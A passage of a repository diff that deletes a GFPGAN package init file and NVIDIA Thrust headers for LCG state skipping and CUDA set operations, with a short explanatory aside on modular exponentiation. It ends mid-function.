spaces/CVPR/GFPGAN-example/gfpgan/__init__.py
DELETED
@@ -1,7 +0,0 @@
-# flake8: noqa
-from .archs import *
-from .data import *
-from .models import *
-from .utils import *
-
-# from .version import *
spaces/CVPR/LIVE/thrust/thrust/random/detail/linear_congruential_engine_discard.h
DELETED
@@ -1,107 +0,0 @@
-/*
- *  Copyright 2008-2013 NVIDIA Corporation
- *
- *  Licensed under the Apache License, Version 2.0 (the "License");
- *  you may not use this file except in compliance with the License.
- *  You may obtain a copy of the License at
- *
- *      http://www.apache.org/licenses/LICENSE-2.0
- *
- *  Unless required by applicable law or agreed to in writing, software
- *  distributed under the License is distributed on an "AS IS" BASIS,
- *  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- *  See the License for the specific language governing permissions and
- *  limitations under the License.
- */
-
-#pragma once
-
-#include <thrust/detail/cstdint.h>
-#include <thrust/random/detail/mod.h>
-
-namespace thrust
-{
-
-namespace random
-{
-
-namespace detail
-{
-
-
-template<typename UIntType, UIntType a, unsigned long long c, UIntType m>
-  struct linear_congruential_engine_discard_implementation
-{
-  __host__ __device__
-  static void discard(UIntType &state, unsigned long long z)
-  {
-    for(; z > 0; --z)
-    {
-      state = detail::mod<UIntType,a,c,m>(state);
-    }
-  }
-}; // end linear_congruential_engine_discard
-
-
-// specialize for small integers and c == 0
-// XXX figure out a robust implemenation of this for any unsigned integer type later
-template<thrust::detail::uint32_t a, thrust::detail::uint32_t m>
-  struct linear_congruential_engine_discard_implementation<thrust::detail::uint32_t,a,0,m>
-{
-  __host__ __device__
-  static void discard(thrust::detail::uint32_t &state, unsigned long long z)
-  {
-    const thrust::detail::uint32_t modulus = m;
-
-    // XXX we need to use unsigned long long here or we will encounter overflow in the
-    //     multiplies below
-    //     figure out a robust implementation of this later
-    unsigned long long multiplier = a;
-    unsigned long long multiplier_to_z = 1;
-
-    // see http://en.wikipedia.org/wiki/Modular_exponentiation
-    while(z > 0)
-    {
-      if(z & 1)
-      {
-        // multiply in this bit's contribution while using modulus to keep result small
-        multiplier_to_z = (multiplier_to_z * multiplier) % modulus;
-      }
-
-      // move to the next bit of the exponent, square (and mod) the base accordingly
-      z >>= 1;
-      multiplier = (multiplier * multiplier) % modulus;
-    }
-
-    state = static_cast<thrust::detail::uint32_t>((multiplier_to_z * state) % modulus);
-  }
-}; // end linear_congruential_engine_discard
-
-
-struct linear_congruential_engine_discard
-{
-  template<typename LinearCongruentialEngine>
-  __host__ __device__
-  static void discard(LinearCongruentialEngine &lcg, unsigned long long z)
-  {
-    typedef typename LinearCongruentialEngine::result_type result_type;
-    const result_type c = LinearCongruentialEngine::increment;
-    const result_type a = LinearCongruentialEngine::multiplier;
-    const result_type m = LinearCongruentialEngine::modulus;
-
-    // XXX WAR unused variable warnings
-    (void) c;
-    (void) a;
-    (void) m;
-
-    linear_congruential_engine_discard_implementation<result_type,a,c,m>::discard(lcg.m_x, z);
-  }
-}; // end linear_congruential_engine_discard
-
-
-} // end detail
-
-} // end random
-
-} // end thrust
-
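The specialized `discard` in the deleted header above skips `z` states of a multiplicative LCG (increment `c == 0`) in O(log z) instead of O(z): since each step is `state = (a * state) % m`, skipping `z` steps is `state = (a^z mod m) * state mod m`, computed by square-and-multiply modular exponentiation. A rough Python sketch of the same idea (not the thrust code itself; function names are mine):

```python
def lcg_discard_fast(state, z, a, m):
    """Skip z states of the LCG state -> (a * state) % m in O(log z),
    using modular exponentiation: new_state = a^z * state (mod m)."""
    return (pow(a, z, m) * state) % m

def lcg_discard_slow(state, z, a, m):
    """Reference: advance the LCG one step at a time."""
    for _ in range(z):
        state = (a * state) % m
    return state
```

For example, with the `minstd` parameters `a = 16807`, `m = 2**31 - 1`, both routes agree, but the fast path needs only about 30 modular multiplies to skip a million states.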
spaces/CVPR/LIVE/thrust/thrust/system/cpp/detail/fill.h
DELETED
@@ -1,22 +0,0 @@
-/*
- *  Copyright 2008-2013 NVIDIA Corporation
- *
- *  Licensed under the Apache License, Version 2.0 (the "License");
- *  you may not use this file except in compliance with the License.
- *  You may obtain a copy of the License at
- *
- *      http://www.apache.org/licenses/LICENSE-2.0
- *
- *  Unless required by applicable law or agreed to in writing, software
- *  distributed under the License is distributed on an "AS IS" BASIS,
- *  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- *  See the License for the specific language governing permissions and
- *  limitations under the License.
- */
-
-#pragma once
-
-#include <thrust/detail/config.h>
-
-// this system has no special version of this algorithm
-
spaces/CVPR/LIVE/thrust/thrust/system/cuda/detail/set_operations.h
DELETED
@@ -1,1998 +0,0 @@
-/******************************************************************************
- * Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions are met:
- *     * Redistributions of source code must retain the above copyright
- *       notice, this list of conditions and the following disclaimer.
- *     * Redistributions in binary form must reproduce the above copyright
- *       notice, this list of conditions and the following disclaimer in the
- *       documentation and/or other materials provided with the distribution.
- *     * Neither the name of the NVIDIA CORPORATION nor the
- *       names of its contributors may be used to endorse or promote products
- *       derived from this software without specific prior written permission.
- *
- * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
- * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE FOR ANY
- * DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
- * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
- * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
- * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
- * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
- *
- ******************************************************************************/
-#pragma once
-
-#if THRUST_DEVICE_COMPILER == THRUST_DEVICE_COMPILER_NVCC
-#include <thrust/system/cuda/detail/util.h>
-
-#include <thrust/detail/cstdint.h>
-#include <thrust/detail/temporary_array.h>
-#include <thrust/system/cuda/detail/execution_policy.h>
-#include <thrust/system/cuda/detail/core/agent_launcher.h>
-#include <thrust/system/cuda/detail/par_to_seq.h>
-#include <thrust/system/cuda/detail/get_value.h>
-#include <thrust/extrema.h>
-#include <thrust/pair.h>
-#include <thrust/set_operations.h>
-#include <thrust/detail/mpl/math.h>
-#include <thrust/distance.h>
-#include <thrust/detail/alignment.h>
-
-namespace thrust
-{
-
-namespace cuda_cub {
-
-namespace __set_operations {
-
-template <bool UpperBound,
-          class IntT,
-          class Size,
-          class It,
-          class T,
-          class Comp>
-THRUST_DEVICE_FUNCTION void
-binary_search_iteration(It data,
-                        Size &begin,
-                        Size &end,
-                        T key,
-                        int shift,
-                        Comp comp)
-{
-
-  IntT scale = (1 << shift) - 1;
-  Size mid   = (begin + scale * end) >> shift;
-
-  T    key2 = data[mid];
-  bool pred = UpperBound ? !comp(key, key2) : comp(key2, key);
-  if (pred)
-    begin = mid + 1;
-  else
-    end = mid;
-}
-
-template <bool UpperBound, class Size, class T, class It, class Comp>
-THRUST_DEVICE_FUNCTION Size
-binary_search(It data, Size count, T key, Comp comp)
-{
-  Size begin = 0;
-  Size end   = count;
-  while (begin < end)
-    binary_search_iteration<UpperBound, int>(data,
-                                             begin,
-                                             end,
-                                             key,
-                                             1,
-                                             comp);
-  return begin;
-}
-
-template <bool UpperBound, class IntT, class Size, class T, class It, class Comp>
-THRUST_DEVICE_FUNCTION Size
-biased_binary_search(It data, Size count, T key, IntT levels, Comp comp)
-{
-  Size begin = 0;
-  Size end   = count;
-
-  if (levels >= 4 && begin < end)
-    binary_search_iteration<UpperBound, IntT>(data, begin, end, key, 9, comp);
-  if (levels >= 3 && begin < end)
-    binary_search_iteration<UpperBound, IntT>(data, begin, end, key, 7, comp);
-  if (levels >= 2 && begin < end)
-    binary_search_iteration<UpperBound, IntT>(data, begin, end, key, 5, comp);
-  if (levels >= 1 && begin < end)
-    binary_search_iteration<UpperBound, IntT>(data, begin, end, key, 4, comp);
-
-  while (begin < end)
-    binary_search_iteration<UpperBound, IntT>(data, begin, end, key, 1, comp);
-  return begin;
-}
-
-template <bool UpperBound, class Size, class It1, class It2, class Comp>
-THRUST_DEVICE_FUNCTION Size
-merge_path(It1 a, Size aCount, It2 b, Size bCount, Size diag, Comp comp)
-{
-  typedef typename thrust::iterator_traits<It1>::value_type T;
-
-  Size begin = thrust::max<Size>(0, diag - bCount);
-  Size end   = thrust::min<Size>(diag, aCount);
-
-  while (begin < end)
-  {
-    Size mid  = (begin + end) >> 1;
-    T    aKey = a[mid];
-    T    bKey = b[diag - 1 - mid];
-    bool pred = UpperBound ? comp(aKey, bKey) : !comp(bKey, aKey);
-    if (pred)
-      begin = mid + 1;
-    else
-      end = mid;
-  }
-  return begin;
-}
-
-template <class It1, class It2, class Size, class Size2, class CompareOp>
-THRUST_DEVICE_FUNCTION pair<Size, Size>
-balanced_path(It1       keys1,
-              It2       keys2,
-              Size      num_keys1,
-              Size      num_keys2,
-              Size      diag,
-              Size2     levels,
-              CompareOp compare_op)
-{
-  typedef typename iterator_traits<It1>::value_type T;
-
-  Size index1 = merge_path<false>(keys1,
-                                  num_keys1,
-                                  keys2,
-                                  num_keys2,
-                                  diag,
-                                  compare_op);
-  Size index2 = diag - index1;
-
-  bool star = false;
-  if (index2 < num_keys2)
-  {
-    T x = keys2[index2];
-
-    // Search for the beginning of the duplicate run in both A and B.
-    Size start1 = biased_binary_search<false>(keys1,
-                                              index1,
-                                              x,
-                                              levels,
-                                              compare_op);
-    Size start2 = biased_binary_search<false>(keys2,
-                                              index2,
-                                              x,
-                                              levels,
-                                              compare_op);
-
-    // The distance between x's merge path and its lower_bound is its rank.
-    // We add up the a and b ranks and evenly distribute them to
-    // get a stairstep path.
-    Size run1      = index1 - start1;
-    Size run2      = index2 - start2;
-    Size total_run = run1 + run2;
-
-    // Attempt to advance b and regress a.
-    Size advance2 = max<Size>(total_run >> 1, total_run - run1);
-    Size end2     = min<Size>(num_keys2, start2 + advance2 + 1);
-
-    Size run_end2 = index2 + binary_search<true>(keys2 + index2,
-                                                 end2 - index2,
-                                                 x,
-                                                 compare_op);
-    run2 = run_end2 - start2;
-
-    advance2      = min<Size>(advance2, run2);
-    Size advance1 = total_run - advance2;
-
-    bool round_up = (advance1 == advance2 + 1) && (advance2 < run2);
-    if (round_up) star = true;
-
-    index1 = start1 + advance1;
-  }
-  return thrust::make_pair(index1, (diag - index1) + star);
-} // func balanced_path
-
-template <int                     _BLOCK_THREADS,
-          int                     _ITEMS_PER_THREAD = 1,
-          cub::BlockLoadAlgorithm _LOAD_ALGORITHM   = cub::BLOCK_LOAD_DIRECT,
-          cub::CacheLoadModifier  _LOAD_MODIFIER    = cub::LOAD_LDG,
-          cub::BlockScanAlgorithm _SCAN_ALGORITHM   = cub::BLOCK_SCAN_WARP_SCANS>
-struct PtxPolicy
-{
-  enum
-  {
-    BLOCK_THREADS    = _BLOCK_THREADS,
-    ITEMS_PER_THREAD = _ITEMS_PER_THREAD,
-    ITEMS_PER_TILE   = _BLOCK_THREADS * _ITEMS_PER_THREAD - 1
-  };
-
-  static const cub::BlockLoadAlgorithm LOAD_ALGORITHM = _LOAD_ALGORITHM;
-  static const cub::CacheLoadModifier  LOAD_MODIFIER  = _LOAD_MODIFIER;
-  static const cub::BlockScanAlgorithm SCAN_ALGORITHM = _SCAN_ALGORITHM;
-}; // PtxPolicy
-
-template<class Arch, class T, class U>
-struct Tuning;
-
-namespace mpl = thrust::detail::mpl::math;
-
-template<class T, class U>
-struct Tuning<sm30,T,U>
-{
-  enum
-  {
-    MAX_INPUT_BYTES             = mpl::max<size_t, sizeof(T), sizeof(U)>::value,
-    COMBINED_INPUT_BYTES        = sizeof(T), // + sizeof(Value),
-    NOMINAL_4B_ITEMS_PER_THREAD = 7,
-    ITEMS_PER_THREAD = mpl::min<
-        int,
-        NOMINAL_4B_ITEMS_PER_THREAD,
-        mpl::max<
-            int,
-            1,
-            ((NOMINAL_4B_ITEMS_PER_THREAD * 4) +
-             COMBINED_INPUT_BYTES - 1) /
-                COMBINED_INPUT_BYTES>::value>::value,
-  };
-
-  typedef PtxPolicy<128,
-                    ITEMS_PER_THREAD,
-                    cub::BLOCK_LOAD_WARP_TRANSPOSE,
-                    cub::LOAD_DEFAULT,
-                    cub::BLOCK_SCAN_WARP_SCANS>
-      type;
-}; // tuning sm30
-
-template<class T, class U>
-struct Tuning<sm52,T,U>
-{
-  enum
-  {
-    MAX_INPUT_BYTES             = mpl::max<size_t, sizeof(T), sizeof(U)>::value,
-    COMBINED_INPUT_BYTES        = sizeof(T), // + sizeof(U),
-    NOMINAL_4B_ITEMS_PER_THREAD = 15,
-    ITEMS_PER_THREAD = mpl::min<
-        int,
-        NOMINAL_4B_ITEMS_PER_THREAD,
-        mpl::max<
-            int,
-            1,
-            ((NOMINAL_4B_ITEMS_PER_THREAD * 4) +
-             COMBINED_INPUT_BYTES - 1) /
-                COMBINED_INPUT_BYTES>::value>::value,
-  };
-
-  typedef PtxPolicy<256,
-                    ITEMS_PER_THREAD,
-                    cub::BLOCK_LOAD_WARP_TRANSPOSE,
-                    cub::LOAD_DEFAULT,
-                    cub::BLOCK_SCAN_WARP_SCANS>
-      type;
-}; // tuning sm52
-
-template<class T, class U>
-struct Tuning<sm60,T,U>
-{
-  enum
-  {
-    MAX_INPUT_BYTES             = mpl::max<size_t, sizeof(T), sizeof(U)>::value,
-    COMBINED_INPUT_BYTES        = sizeof(T), // + sizeof(U),
-    NOMINAL_4B_ITEMS_PER_THREAD = 19,
-    ITEMS_PER_THREAD = mpl::min<
-        int,
-        NOMINAL_4B_ITEMS_PER_THREAD,
-        mpl::max<
-            int,
-            1,
-            ((NOMINAL_4B_ITEMS_PER_THREAD * 4) +
-             COMBINED_INPUT_BYTES - 1) /
-                COMBINED_INPUT_BYTES>::value>::value,
-  };
-
-  typedef PtxPolicy<512,
-                    ITEMS_PER_THREAD,
-                    cub::BLOCK_LOAD_WARP_TRANSPOSE,
-                    cub::LOAD_DEFAULT,
-                    cub::BLOCK_SCAN_WARP_SCANS>
-      type;
-}; // tuning sm60
-
-template <class KeysIt1,
-          class KeysIt2,
-          class ValuesIt1,
-          class ValuesIt2,
-          class KeysOutputIt,
-          class ValuesOutputIt,
-          class Size,
-          class CompareOp,
-          class SetOp,
-          class HAS_VALUES>
-struct SetOpAgent
-{
-  typedef typename iterator_traits<KeysIt1>::value_type   key1_type;
-  typedef typename iterator_traits<KeysIt2>::value_type   key2_type;
-  typedef typename iterator_traits<ValuesIt1>::value_type value1_type;
-  typedef typename iterator_traits<ValuesIt2>::value_type value2_type;
-
-  typedef key1_type   key_type;
-  typedef value1_type value_type;
-
-  typedef cub::ScanTileState<Size> ScanTileState;
-
-  template <class Arch>
-  struct PtxPlan : Tuning<Arch, key_type, value_type>::type
-  {
-    typedef Tuning<Arch, key_type, value_type> tuning;
-
-    typedef typename core::LoadIterator<PtxPlan, KeysIt1>::type   KeysLoadIt1;
-    typedef typename core::LoadIterator<PtxPlan, KeysIt2>::type   KeysLoadIt2;
-    typedef typename core::LoadIterator<PtxPlan, ValuesIt1>::type ValuesLoadIt1;
-    typedef typename core::LoadIterator<PtxPlan, ValuesIt2>::type ValuesLoadIt2;
-
-    typedef typename core::BlockLoad<PtxPlan, KeysLoadIt1>::type   BlockLoadKeys1;
-    typedef typename core::BlockLoad<PtxPlan, KeysLoadIt2>::type   BlockLoadKeys2;
-    typedef typename core::BlockLoad<PtxPlan, ValuesLoadIt1>::type BlockLoadValues1;
-    typedef typename core::BlockLoad<PtxPlan, ValuesLoadIt2>::type BlockLoadValues2;
-
-    typedef cub::TilePrefixCallbackOp<Size,
-                                      cub::Sum,
-                                      ScanTileState,
-                                      Arch::ver>
-        TilePrefixCallback;
-
-    typedef cub::BlockScan<Size,
-                           PtxPlan::BLOCK_THREADS,
-                           PtxPlan::SCAN_ALGORITHM,
-                           1,
-                           1,
-                           Arch::ver>
-        BlockScan;
-
-    // gather required temporary storage in a union
-    //
-    union TempStorage
-    {
-      struct
-      {
-        typename BlockScan::TempStorage          scan;
-        typename TilePrefixCallback::TempStorage prefix;
-      };
-
-      struct
-      {
-        core::uninitialized_array<int, PtxPlan::BLOCK_THREADS>
-            offset;
-        union
-        {
-          typename BlockLoadKeys1::TempStorage   load_keys1;
-          typename BlockLoadKeys2::TempStorage   load_keys2;
-          typename BlockLoadValues1::TempStorage load_values1;
-          typename BlockLoadValues2::TempStorage load_values2;
-
-          // Allocate more shmem than truly necessary.
-          // This permits avoiding range checks in
-          // serial set operations, e.g. serial_set_difference
-          core::uninitialized_array<
-              key_type,
-              PtxPlan::ITEMS_PER_TILE + PtxPlan::BLOCK_THREADS>
-              keys_shared;
-
-          core::uninitialized_array<
-              value_type,
-              PtxPlan::ITEMS_PER_TILE + PtxPlan::BLOCK_THREADS>
-              values_shared;
-        };
-      };
-    }; // union TempStorage
-  };   // struct PtxPlan
-
-  typedef typename core::specialize_plan_msvc10_war<PtxPlan>::type::type ptx_plan;
-
-  typedef typename ptx_plan::KeysLoadIt1   KeysLoadIt1;
-  typedef typename ptx_plan::KeysLoadIt2   KeysLoadIt2;
-  typedef typename ptx_plan::ValuesLoadIt1 ValuesLoadIt1;
-  typedef typename ptx_plan::ValuesLoadIt2 ValuesLoadIt2;
-
-  typedef typename ptx_plan::BlockLoadKeys1   BlockLoadKeys1;
-  typedef typename ptx_plan::BlockLoadKeys2   BlockLoadKeys2;
-  typedef typename ptx_plan::BlockLoadValues1 BlockLoadValues1;
-  typedef typename ptx_plan::BlockLoadValues2 BlockLoadValues2;
-
-  typedef typename ptx_plan::TilePrefixCallback TilePrefixCallback;
-  typedef typename ptx_plan::BlockScan          BlockScan;
-
-  typedef typename ptx_plan::TempStorage TempStorage;
-
-  enum
-  {
-    ITEMS_PER_THREAD = ptx_plan::ITEMS_PER_THREAD,
-    BLOCK_THREADS    = ptx_plan::BLOCK_THREADS,
-  };
-
-  struct impl
-  {
-    //---------------------------------------------------------------------
-    // Per-thread fields
-    //---------------------------------------------------------------------
-
-    TempStorage &  storage;
-    ScanTileState &tile_state;
-    KeysLoadIt1    keys1_in;
-    KeysLoadIt2    keys2_in;
-    ValuesLoadIt1  values1_in;
-    ValuesLoadIt2  values2_in;
-    Size           keys1_count;
-    Size           keys2_count;
-    KeysOutputIt   keys_out;
-    ValuesOutputIt values_out;
-    CompareOp      compare_op;
-    SetOp          set_op;
-    pair<Size, Size> *partitions;
-    std::size_t *  output_count;
-
-    //---------------------------------------------------------------------
-    // Utility functions
-    //---------------------------------------------------------------------
-
-    template <bool IS_FULL_TILE, class T, class It1, class It2>
-    THRUST_DEVICE_FUNCTION void
-    gmem_to_reg(T (&output)[ITEMS_PER_THREAD],
-                It1 input1,
-                It2 input2,
-                int count1,
-                int count2)
-    {
-      if (IS_FULL_TILE)
-      {
-#pragma unroll
-        for (int ITEM = 0; ITEM < ITEMS_PER_THREAD - 1; ++ITEM)
-        {
-          int idx      = BLOCK_THREADS * ITEM + threadIdx.x;
-          output[ITEM] = (idx < count1)
-                             ? static_cast<T>(input1[idx])
-                             : static_cast<T>(input2[idx - count1]);
-        }
-
-        // last ITEM might be a conditional load even for full tiles
-        // please check first before attempting to load.
-        int ITEM = ITEMS_PER_THREAD - 1;
-        int idx  = BLOCK_THREADS * ITEM + threadIdx.x;
-        if (idx < count1 + count2)
-          output[ITEM] = (idx < count1)
-                             ? static_cast<T>(input1[idx])
-                             : static_cast<T>(input2[idx - count1]);
-      }
-      else
-      {
-#pragma unroll
-        for (int ITEM = 0; ITEM < ITEMS_PER_THREAD; ++ITEM)
-        {
-          int idx = BLOCK_THREADS * ITEM + threadIdx.x;
-          if (idx < count1 + count2)
-          {
-            output[ITEM] = (idx < count1)
-                               ? static_cast<T>(input1[idx])
-                               : static_cast<T>(input2[idx - count1]);
-          }
-        }
-      }
-    }
-
-    template <class T, class It>
-    THRUST_DEVICE_FUNCTION void
-    reg_to_shared(It output,
-                  T (&input)[ITEMS_PER_THREAD])
-    {
-#pragma unroll
-      for (int ITEM = 0; ITEM < ITEMS_PER_THREAD; ++ITEM)
-      {
-        int idx     = BLOCK_THREADS * ITEM + threadIdx.x;
-        output[idx] = input[ITEM];
-      }
-    }
-
-    template <class OutputIt, class T, class SharedIt>
-    void THRUST_DEVICE_FUNCTION
-    scatter(OutputIt output,
-            T (&input)[ITEMS_PER_THREAD],
-            SharedIt shared,
-            int      active_mask,
-            Size     thread_output_prefix,
-            Size     tile_output_prefix,
-            int      tile_output_count)
-    {
-      using core::sync_threadblock;
-
-      int local_scatter_idx = thread_output_prefix - tile_output_prefix;
-#pragma unroll
-      for (int ITEM = 0; ITEM < ITEMS_PER_THREAD; ++ITEM)
-      {
-        if (active_mask & (1 << ITEM))
-        {
-          shared[local_scatter_idx++] = input[ITEM];
-        }
-      }
-      sync_threadblock();
-
-      for (int item = threadIdx.x;
-           item < tile_output_count;
-           item += BLOCK_THREADS)
-      {
-        output[tile_output_prefix + item] = shared[item];
-      }
-    }
-
-    int THRUST_DEVICE_FUNCTION
-    serial_set_op(key_type *keys,
-                  int       keys1_beg,
-                  int       keys2_beg,
-                  int       keys1_count,
-                  int       keys2_count,
-                  key_type (&output)[ITEMS_PER_THREAD],
-                  int (&indices)[ITEMS_PER_THREAD],
-                  CompareOp compare_op,
-                  SetOp     set_op)
-    {
-      int active_mask = set_op(keys,
-                               keys1_beg,
-                               keys2_beg,
-                               keys1_count,
-                               keys2_count,
-                               output,
-                               indices,
-                               compare_op);
-
-      return active_mask;
-    }
-
-    //---------------------------------------------------------------------
-    // Tile operations
-    //---------------------------------------------------------------------
-
-    template <bool IS_LAST_TILE>
-    void THRUST_DEVICE_FUNCTION
-    consume_tile(Size tile_idx)
-    {
-      using core::sync_threadblock;
-      using core::uninitialized_array;
-
-      pair<Size, Size> partition_beg = partitions[tile_idx + 0];
-      pair<Size, Size> partition_end = partitions[tile_idx + 1];
-
-      Size keys1_beg = partition_beg.first;
-      Size keys1_end = partition_end.first;
-      Size keys2_beg = partition_beg.second;
-      Size keys2_end = partition_end.second;
-
-      // number of keys per tile
-      //
-      int num_keys1 = static_cast<int>(keys1_end - keys1_beg);
-      int num_keys2 = static_cast<int>(keys2_end - keys2_beg);
-
-      // load keys into shared memory for further processing
-      key_type keys_loc[ITEMS_PER_THREAD];
-
-      gmem_to_reg<!IS_LAST_TILE>(keys_loc,
-                                 keys1_in + keys1_beg,
-                                 keys2_in + keys2_beg,
-                                 num_keys1,
-                                 num_keys2);
-
-      reg_to_shared(&storage.keys_shared[0], keys_loc);
-
-      sync_threadblock();
-
-      int diag_loc = min<int>(ITEMS_PER_THREAD * threadIdx.x,
-                              num_keys1 + num_keys2);
-
-      pair<int, int> partition_loc =
-          balanced_path(&storage.keys_shared[0],
-                        &storage.keys_shared[num_keys1],
-                        num_keys1,
-                        num_keys2,
-                        diag_loc,
-                        4,
-                        compare_op);
-
-      int keys1_beg_loc = partition_loc.first;
-      int keys2_beg_loc = partition_loc.second;
-
-      // compute difference between next and current thread
-      // to obtain number of elements per thread
-      int value = threadIdx.x == 0
-                      ? (num_keys1 << 16) | num_keys2
-                      : (partition_loc.first << 16) | partition_loc.second;
-
-      int dst = threadIdx.x == 0 ? BLOCK_THREADS - 1 : threadIdx.x - 1;
-      storage.offset[dst] = value;
-
-      core::sync_threadblock();
-
-      pair<int, int> partition1_loc = thrust::make_pair(
-          storage.offset[threadIdx.x] >> 16,
-          storage.offset[threadIdx.x] & 0xFFFF);
-
-      int keys1_end_loc = partition1_loc.first;
-      int keys2_end_loc = partition1_loc.second;
-
-      int num_keys1_loc = keys1_end_loc - keys1_beg_loc;
-      int num_keys2_loc = keys2_end_loc - keys2_beg_loc;
-
-      // perform serial set operation
-      //
-      int indices[ITEMS_PER_THREAD];
-
-      int active_mask = serial_set_op(&storage.keys_shared[0],
-                                      keys1_beg_loc,
-                                      keys2_beg_loc + num_keys1,
-                                      num_keys1_loc,
-                                      num_keys2_loc,
-                                      keys_loc,
-                                      indices,
-                                      compare_op,
-                                      set_op);
-      sync_threadblock();
-#if 0
-      if (ITEMS_PER_THREAD * threadIdx.x >= num_keys1 + num_keys2)
-        active_mask = 0;
-#endif
-
-      // look-back scan over thread_output_count
-      // to compute global thread_output_base and tile_output_count;
-      Size tile_output_count    = 0;
-      Size thread_output_prefix = 0;
-      Size tile_output_prefix   = 0;
-      Size thread_output_count  = static_cast<Size>(__popc(active_mask));
-
-      if (tile_idx == 0) // first tile
-      {
-        BlockScan(storage.scan)
-            .ExclusiveSum(thread_output_count,
-                          thread_output_prefix,
-                          tile_output_count);
-        if (threadIdx.x == 0)
-        {
-          // Update tile status if this is not the last tile
-          if (!IS_LAST_TILE)
-          {
-            tile_state.SetInclusive(0, tile_output_count);
-          }
-        }
-      }
-      else
-      {
-        TilePrefixCallback prefix_cb(tile_state,
-                                     storage.prefix,
-                                     cub::Sum(),
-                                     tile_idx);
-
-        BlockScan(storage.scan)
-            .ExclusiveSum(thread_output_count,
-                          thread_output_prefix,
-                          prefix_cb);
-        tile_output_count  = prefix_cb.GetBlockAggregate();
-        tile_output_prefix = prefix_cb.GetExclusivePrefix();
-      }
-
-      sync_threadblock();
-
-      // scatter results
-      //
-      scatter(keys_out,
-              keys_loc,
-              &storage.keys_shared[0],
-              active_mask,
-              thread_output_prefix,
-              tile_output_prefix,
-              tile_output_count);
-
-      if (HAS_VALUES::value)
-      {
-        value_type values_loc[ITEMS_PER_THREAD];
-        gmem_to_reg<!IS_LAST_TILE>(values_loc,
-                                   values1_in + keys1_beg,
-                                   values2_in + keys2_beg,
-                                   num_keys1,
-                                   num_keys2);
-
-        sync_threadblock();
-
-        reg_to_shared(&storage.values_shared[0], values_loc);
-
-        sync_threadblock();
-
-        // gather items from shared mem
-        //
-#pragma unroll
-        for (int ITEM = 0; ITEM < ITEMS_PER_THREAD; ++ITEM)
-        {
-          if (active_mask & (1 << ITEM))
-          {
-            values_loc[ITEM] = storage.values_shared[indices[ITEM]];
-          }
-        }
-
-        sync_threadblock();
-
-        scatter(values_out,
-                values_loc,
-                &storage.values_shared[0],
-                active_mask,
-                thread_output_prefix,
-                tile_output_prefix,
-                tile_output_count);
-      }
-
-      if (IS_LAST_TILE && threadIdx.x == 0)
-      {
-        *output_count = tile_output_prefix + tile_output_count;
-      }
-    }
-
-    //---------------------------------------------------------------------
-    // Constructor
-    //---------------------------------------------------------------------
-
-    THRUST_DEVICE_FUNCTION
-    impl(TempStorage &  storage_,
-         ScanTileState &tile_state_,
-         KeysIt1        keys1_,
-         KeysIt2        keys2_,
-         ValuesIt1      values1_,
-         ValuesIt2      values2_,
-         Size           keys1_count_,
-         Size           keys2_count_,
-         KeysOutputIt   keys_out_,
-         ValuesOutputIt values_out_,
-         CompareOp      compare_op_,
-         SetOp          set_op_,
-         pair<Size, Size> *partitions_,
-         std::size_t *  output_count_)
-        : storage(storage_),
-          tile_state(tile_state_),
-          keys1_in(core::make_load_iterator(ptx_plan(), keys1_)),
-          keys2_in(core::make_load_iterator(ptx_plan(), keys2_)),
-          values1_in(core::make_load_iterator(ptx_plan(), values1_)),
-          values2_in(core::make_load_iterator(ptx_plan(), values2_)),
-          keys1_count(keys1_count_),
-          keys2_count(keys2_count_),
-          keys_out(keys_out_),
-          values_out(values_out_),
-          compare_op(compare_op_),
-          set_op(set_op_),
-          partitions(partitions_),
-          output_count(output_count_)
-    {
-      int tile_idx  = blockIdx.x;
-      int num_tiles = gridDim.x;
-
-      if (tile_idx < num_tiles - 1)
-      {
-        consume_tile<false>(tile_idx);
-      }
-      else
-      {
-        consume_tile<true>(tile_idx);
-      }
-    }
-  }; // struct impl
-
-  //---------------------------------------------------------------------
-  // Agent entry point
-  //---------------------------------------------------------------------
-
-  THRUST_AGENT_ENTRY(KeysIt1        keys1,
-                     KeysIt2        keys2,
-                     ValuesIt1      values1,
-                     ValuesIt2      values2,
-                     Size           keys1_count,
-                     Size           keys2_count,
-                     KeysOutputIt   keys_output,
-                     ValuesOutputIt values_output,
-                     CompareOp      compare_op,
-                     SetOp          set_op,
-                     pair<Size, Size> *partitions,
-                     std::size_t *  output_count,
-                     ScanTileState  tile_state,
-                     char *         shmem)
-  {
-    TempStorage &storage = *reinterpret_cast<TempStorage *>(shmem);
-
-    impl(storage,
-         tile_state,
-         keys1,
-         keys2,
-         values1,
-         values2,
-         keys1_count,
-         keys2_count,
-         keys_output,
-         values_output,
-         compare_op,
-         set_op,
-         partitions,
-         output_count);
-  }
-}; // struct SetOpAgent
-
-template <class KeysIt1,
-          class KeysIt2,
-          class Size,
-          class CompareOp>
-struct PartitionAgent
-{
-  template <class Arch>
-  struct PtxPlan : PtxPolicy<256> {};
-
-  typedef core::specialize_plan<PtxPlan> ptx_plan;
-
-  //---------------------------------------------------------------------
-  // Agent entry point
-  //---------------------------------------------------------------------
-
-  THRUST_AGENT_ENTRY(KeysIt1 keys1,
-                     KeysIt2 keys2,
-                     Size    keys1_count,
-                     Size    keys2_count,
-                     Size    num_partitions,
-                     pair<Size, Size> *partitions,
-                     CompareOp compare_op,
-                     int       items_per_tile,
-                     char * /*shmem*/)
-  {
